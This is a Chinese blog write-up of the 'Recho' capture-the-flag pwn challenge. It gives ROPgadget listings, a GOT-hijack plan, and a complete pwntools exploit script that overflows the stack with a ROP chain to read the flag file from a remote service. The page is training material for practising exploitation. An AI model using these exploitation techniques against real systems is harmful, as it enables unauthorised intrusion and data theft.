攻防世界 Pwn Recho

最新推荐文章于 2024-07-24 10:35:36 发布
最新推荐文章于 2024-07-24 10:35:36 发布
阅读量644 收藏 1
点赞数
分类专栏: Pwn 文章标签: 安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrTreebook/article/details/122013597
版权

攻防世界 Pwn Recho

1.题目下载地址

点击下载

2.checksec

在这里插入图片描述

3.IDA分析

在这里插入图片描述
可以看到这个while是死循环
所以要学会使用pwntools的shutdown功能来退出循环
但是循环退出之后就不能再进入了
接下来要看一下漏洞在哪
在这里插入图片描述

这个题目有个明显后门,在data段发现有flag。可以将它read到bss段中,再通过write输出出来
在gdb动态调试时,分析alarm,发现有
在这里插入图片描述
有syscall系统调用
漏洞利用思路如下:

    1. alrm函数got表劫持到syscall位置
    1. open(‘flag’,READONLY)
    1. 通过read将flag写入到bss段,之后再write输出

ROP链条:
syscall>>flag>>read>>write
ROP地址

└─$ ROPgadget --binary ./Recho --only 'pop|ret'                                                                                              148 ⨯ 1 ⚙
Gadgets information
============================================================
0x000000000040089c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040089e : pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004008a0 : pop r14 ; pop r15 ; ret
0x00000000004008a2 : pop r15 ; ret
0x00000000004006fc : pop rax ; ret <--------------------
0x000000000040089b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040089f : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400690 : pop rbp ; ret
0x00000000004008a3 : pop rdi ; ret   <-----------------------
0x00000000004006fe : pop rdx ; ret   <------------------------
0x00000000004008a1 : pop rsi ; pop r15 ; ret          <---------------------
0x000000000040089d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004005b6 : ret

Unique gadgets found: 13


└─$ ROPgadget --binary ./Recho --only 'add|ret'                                                                                              130 ⨯ 1 ⚙
Gadgets information
============================================================
0x00000000004008af : add bl, dh ; ret
0x00000000004008ad : add byte ptr [rax], al ; add bl, dh ; ret
0x00000000004008ab : add byte ptr [rax], al ; add byte ptr [rax], al ; add bl, dh ; ret
0x00000000004008ac : add byte ptr [rax], al ; add byte ptr [rax], al ; ret
0x0000000000400830 : add byte ptr [rax], al ; add cl, cl ; ret
0x00000000004008ae : add byte ptr [rax], al ; ret
0x00000000004006f8 : add byte ptr [rcx], al ; ret
0x000000000040070d : add byte ptr [rdi], al ; ret     <---------------------------
0x0000000000400832 : add cl, cl ; ret
0x00000000004006f4 : add eax, 0x20098e ; add ebx, esi ; ret
0x000000000040070a : add eax, 0x70093eb ; ret
0x00000000004006f9 : add ebx, esi ; ret
0x00000000004005b3 : add esp, 8 ; ret
0x00000000004005b2 : add rsp, 8 ; ret
0x00000000004005b6 : ret

Unique gadgets found: 15

4.exp

from pwn import *
context.log_level = 'debug'
elf=ELF('./Recho')
p=remote('111.200.241.244',57662)
prdi=0x4008a3
prsi=0x4008a1
prdx=0x4006fe
prax=0x4006fc
padd=0x40070d
alarm=elf.plt['alarm']
read=elf.plt['read']
write=elf.plt['write']
printf=elf.plt['printf']
alarm_got=elf.got['alarm']
flag=0x601058
bss=0x601090
payload='a'*0x38
payload+=p64(prax)+p64(0x5)
payload+=p64(prdi)+p64(alarm_got)
payload+=p64(padd)
payload+=p64(prax)+p64(0x2)
payload+=p64(prdi)+p64(flag)
payload+=p64(prdx)+p64(0)
payload+=p64(prsi)+p64(0)+p64(0)
payload+=p64(alarm)
payload+=p64(prdi)+p64(3)      
payload+=p64(prsi)+p64(bss+0x500)+p64(0)
payload+=p64(prdx)+p64(0x30)
payload+=p64(read)
payload+=p64(prdi)+p64(bss+0x500)
payload+=p64(printf)
p.recvuntil('Welcome to Recho server!\n')
p.sendline(str(0x200))
payload=payload.ljust(0x200,'\x00')
p.send(payload)
p.recv()
p.shutdown('send')
p.interactive()
p.close()

在这里插入图片描述

==Microsoft==
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
攻防世界 pwn
清霂的博客
02-02 641
目录1.get_shell2.when_did_you_born3.hello_pwn4.level05.level26.cgpwn2 1.get_shell nc连接题 连接后ls | cat flag 2.when_did_you_born file checksec 有canary保护,不能栈溢出 ida64 先输入v5,v5不能等于1926。再输入v4,注意有gets函数,不限制输入,但无法溢出,点进去v4,v5 发现var_18是v5,var_20是v4,那么可以输入v4时将v5的值覆盖为19
攻防世界 pwn forgot
qq_39596232的博客
06-19 404
下面记录一下我在做攻防世界pwn练习题中的forgot题目的过程,这个题目现在还是有些疑惑的 首先我们看一下题目的安全机制: 然后IDA看一下主函数: int __cdecl main() { size_t v0; // ebx char v2[32]; // [esp+10h] [ebp-74h] int (*v3)(); // [esp+30h] [ebp-54h] int (*v4)(); // [esp+34h] [ebp-50h] int (*v5)(); .
shutdown:shutdown可用于正常退出正在运行的程序(的一部分)
02-13
关掉 shutdown可用于正常退出正在运行的程序(的一部分) 例子 以下示例显示了如何创建新的关闭通道,创建一些分支,订阅一些侦听器以及关闭其中一个分支: use shutdown :: Shutdown; fn main () { let root = Shutdown :: new (). unwrap (); // Create two new branches. let branch1 = root. branch (); let branch2 = root. branch (); // Create two new subscribers to the first branch. let subscriber1 = branch1. subscribe (); let subscriber2 = branch1. su
pwn-Recho
醉等佳人归
09-08 273
1.题目 1.保护机制 开启nx 2.关键代码 2.思路 重点1:看出来是个很简单的栈溢出,但是第一个问题是这个循环是个死循环,如果直接使用close()函数程序会直接退出,查询资料后发现pwn库中提供了shutdown()函数,他可以关闭IO流,即让循环正常退出 重点2:既然使用shutdown函数,我们必须一次性将payload发送过去,这就导致我们不能使用内存泄漏来泄漏system函数,查询了一下字符串发现有一个flag,所以我们考虑使用系统调用完成,alarm,open,read,write函数的
攻防世界】Recho
weixin_43960998的博客
03-28 670
1.程序逆向 简单,略 2.漏洞利用 这道题想了半天,没想明白怎么退出循环,所以看了 ha1vk 师傅博客,学习了一波。 退出循环主要是利用 pwntools 提供的一个功能:shutdown。这个功能可以关闭流,这样就可以退出循环了。     因为对于有些系统,system 可以用系统调用,但是有些不行,所以这里采用 orw 的方式读取 flag。 shift + f12 可以看到 flag 字符串,所以也可能是提示我们。 题目中有了 read,write 可以使用
pwntools发送eof信号
SkYe's Blog
05-28 1605
做题目遇到的两种 eof 信号需求情况: 发送 eof 之后,后续不需要继续输入(vnctf-White-Give-Flag) 发送 eof 之后,后续还需要继续输入(mtctf-blind) eof 发送后继续输入 不用 mtctf-blind 做例子,因为利用 eof 绕过第一层之后,由于题目其他方面而无法 getshell ,用一个 demo 例子(来源)代替: #include <stdio.h> #include <stdlib.h> #include <stri
攻防世界进阶题Recho——知识点缝合怪
weixin_48066554的博客
09-20 829
攻防世界进阶题Recho——知识点缝合怪 文章目录攻防世界进阶题Recho——知识点缝合怪引入初分析1、checksec2、主函数结构3、栈结构4、特殊字符串解题过程1、gadget搜集2、GOT表详情3、函数参数说明exp(详细注释) 引入 好久没有做pwn题了,手生的厉害,做道简单题练练手好了 这道题其实难度不高,属于那种开门见山把漏洞点抛出任君采撷的题,但是由于涉及的知识点较多,在ROP链构造时需要有清晰的思路,对于我这样的小白来说自然是再好不过的练习题。 初分析 1、checksec 题目拿到手上,
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
攻防世界--Recho
qq_73149934的博客
02-07 207
攻防世界--Recho
攻防世界PWN之Recho题解
seaaseesa的博客
11-09 2337
Recho 首先,还是查看一下程序的保护机制。看起来不错。 然后用IDA分析 看起来是一个很简单的溢出,然而,这题的难点在于这个循环如何结束。read一直都是真,如果是在linux终端上直接运行,我们可以用Ctrl+D,然而,pwn远程,就无法处理这种信号。幸运的是pwntools提供了一个shutdown功能,该功能可以关闭流,如果我们关闭输入流,这个循环就结束了。但是我们别想再次...
PWN做题笔记10-repeater(ALSR绕过)
qq_40923256的博客
05-10 391
泰山杯pwn部分的题目:repeater
pwn学习】GOT表劫持
Morphy_Amo的博客
12-15 3880
文章目录例题GOT表劫持获取Syscallopen-read-write利用系统调用号调用open构造payload获取syscall读取flag文件exp 例题 例题:XCTF-008-Recho 查看安全策略 root@kali:~/ctf/xctf/pwn# checksec 008_Recho [*] '/root/ctf/xctf/pwn/008_Recho' Arch: amd64-64-little RELRO: Partial RELRO Stac
pwntools 简单用法
xuqi7
05-07 3209
官方一个示例 remote.py   """ Example showing how to use the remote class. """ from pwn import * # 也可以直接 import pwn sock = remote('127.0.0.1', 9001) # 连接远程服务 print sock.recvline() # ...
Pwntools使用介绍
AlexYoung28的博客
10-18 7885
pwntools是一个用python编写的CTF pwn题exploit编写工具,目的是为了帮助 使用者更高效便捷地编写exploit。 目前最新稳定版本为3.12.0(2018年5月 )。文档地址:docs.pwntools.com。 一、环境变量设置 Pwntools的许多设置都是通过全局变量context进行控制的,例如系统、架构、字节序等都可以通过如下的方法更改: &gt;&gt;...
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
最新发布
lupai的博客
07-24 189
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值